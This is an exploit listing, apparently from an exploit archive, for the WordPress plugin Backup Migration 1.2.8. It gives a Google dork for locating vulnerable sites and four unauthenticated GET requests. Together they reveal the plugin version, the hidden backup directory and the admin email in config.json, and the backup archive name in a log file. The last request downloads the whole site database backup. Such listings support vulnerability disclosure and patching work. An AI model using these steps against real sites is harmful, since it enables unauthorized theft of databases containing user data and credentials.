Share
## https://sploitus.com/exploit?id=PACKETSTORM:172515
# Exploit Title: WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup  
# Google Dork: intitle:("Index of /wp-content/plugins/backup-backup") AND inurl:("plugins/backup-backup/")  
# Date: 2023-05-10  
# Exploit Author: Wadeek  
# Vendor Homepage: https://backupbliss.com/  
# Software Link: https://downloads.wordpress.org/plugin/backup-backup.1.2.8.zip  
# Version: 1.2.8  
# Tested on: WordPress 6.2  
  
1) Get the version of the plugin.  
  
=> GET /wp-content/plugins/backup-backup/readme.txt  
--------------------------------------------------------------------------  
Stable tag: 1.2.8  
--------------------------------------------------------------------------  
  
2) Get the name of the backup directory.  
  
=> GET /wp-content/backup-migration/config.json  
--------------------------------------------------------------------------  
{  
[...],  
"STORAGE::LOCAL::PATH":"[...]/wp-content/backup-migration-xXxXxxXxXx",  
[...],  
"OTHER:EMAIL":"admin@email.com"  
}  
--------------------------------------------------------------------------  
  
3) Get the name of the archive containing the backups.  
  
=> GET /wp-content/backup-migration/complete_logs.log  
--------------------------------------------------------------------------  
BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip  
--------------------------------------------------------------------------  
  
4) Build the path for the download.  
  
=> GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip